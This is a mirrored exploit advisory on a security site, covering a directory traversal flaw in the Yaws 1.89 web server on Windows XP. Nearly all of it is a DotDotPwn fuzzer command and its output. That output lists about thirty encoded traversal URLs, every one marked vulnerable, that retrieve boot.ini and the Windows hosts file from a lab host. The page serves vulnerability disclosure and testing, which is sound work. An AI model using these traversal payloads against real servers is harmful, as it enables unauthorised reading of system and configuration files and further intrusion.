首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Yaws 1.89 Directory Traversal Exploit
来源:http://chatsubo-labs.blogspot.com 作者:nitr0us 发布时间:2010-11-02  
# Exploit Title: Yaws 1.89 Directory Traversal
# Date: 29 Oct
# Author: nitr0us (Alejandro Hernandez H.)
# Software Link: http://yaws.hyber.org/download/Yaws-1.89-windows-installer.exe
# Version: 1.89
# Tested on: Windows XP Service Pack 2

Chatsubo [(in)Security Dark] Labs
http://chatsubo-labs.blogspot.com
http://www.brainoverflow.org

EXPLOIT:
************************************************************************************
******* Released @ BugCon Security Conferences 2010 - http://www.bugcon.org ********
************************************************************************************

nitr0us@daiquiri ~ #./dotdotpwn.pl -m http -h 192.168.242.128 -O -s -d 3 -t 100 -q
#################################################################################
#                                                                               #
#  CubilFelino                                                       Chatsubo   #
#  Security Research Lab              and            [(in)Security Dark] Labs   #
#  chr1x.sectester.net                             chatsubo-labs.blogspot.com   #
#                                                                               #
#                               pr0udly present:                                #
#                                                                               #
#  ________            __  ________            __  __________                   #
#  \______ \    ____ _/  |_\______ \    ____ _/  |_\______   \__  _  __ ____    #
#   |    |  \  /  _ \\   __\|    |  \  /  _ \\   __\|     ___/\ \/ \/ //    \   #
#   |    `   \(  <_> )|  |  |    `   \(  <_> )|  |  |    |     \     /|   |  \  #
#  /_______  / \____/ |__| /_______  / \____/ |__|  |____|      \/\_/ |___|  /  #
#          \/                      \/                                      \/   #
#                               - DotDotPwn v2.1 -                              #
#                         The Directory Traversal Fuzzer                        #
#                         http://dotdotpwn.sectester.net                        #
#                            dotdotpwn@sectester.net                            #
#                                                                               #
#                              by chr1x & nitr0us                               #
#################################################################################


[========== TARGET INFORMATION ==========]
[+] Hostname: 192.168.242.128
[+] Detecting Operating System (nmap) ...
[+] Operating System detected:  Microsoft Windows XP SP2 or Windows Server 2003 SP0/SP1
[+] Protocol: http
[+] Port: 80
[+] Service detected:
Yaws/1.89 Yet Another Web Server
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 3 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (windows)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 2328

[=========== TESTING RESULTS ============]
[+] Ready to launch 10.00 traversals per second
[+] Press any key to start the testing (You can stop it pressing Ctrl + C)

[*] Testing Path: http://192.168.242.128:80/..\..\..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\..\..\windows\system32\drivers\etc\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..%5c..%5c..%5cboot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/%2e%2e\%2e%2e\%2e%2e\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/%2e%2e\%2e%2e\%2e%2e\windows\system32\drivers\etc\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\\..\\..\\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\\..\\..\\windows\\system32\\drivers\\etc\\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\\\..\\\..\\\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\\\..\\\..\\\windows\\\system32\\\drivers\\\etc\\\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\/..\/..\/boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\/..\/..\/windows\/system32\/drivers\/etc\/hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\/\..\/\..\/\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\/\..\/\..\/\windows\/\system32\/\drivers\/\etc\/\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/\../\../\../boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/\../\../\../windows/\system32/\drivers/\etc/\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80//..\/..\/..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80//..\/..\/..\windows\/system32\/drivers\/etc\/hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/.\..\.\..\.\..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/.\..\.\..\.\..\windows\system32\drivers\etc\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/.\\..\\.\\..\\.\\..\\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/.\\..\\.\\..\\.\\..\\windows\\system32\\drivers\\etc\\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\windows\system32\drivers\etc\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80////..\..\..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80////..\..\..\windows///system32///drivers///etc///hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/\\\..\..\..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/\\\..\..\..\windows\\\system32\\\drivers\\\etc\\\hosts <- VULNERABLE!

[+] Fuzz testing finished after 10.68 minutes (641 seconds)
[+] Total Traversals found: 30


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Rising RSNTGDI.sys Local Denia
·discuz 7.0-7.2 get shell
·Xerox 4595 Denial of Service V
·Trend Micro Titanium Maximum S
·AVG Internet Security v9.0.851
·Sybase Advantage Data Architec
·MetInfo 3.0 (fckeditor) Arbitr
·Mongoose Web Server 2.11 Direc
·Quickzip 5.1.8.1 Denial of Ser
·Maxthon 3.0.18.1000 CSS Denial
·Linux kernel arbitrary write m
·Dolphin v7.0.3 Multiple Vulner
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved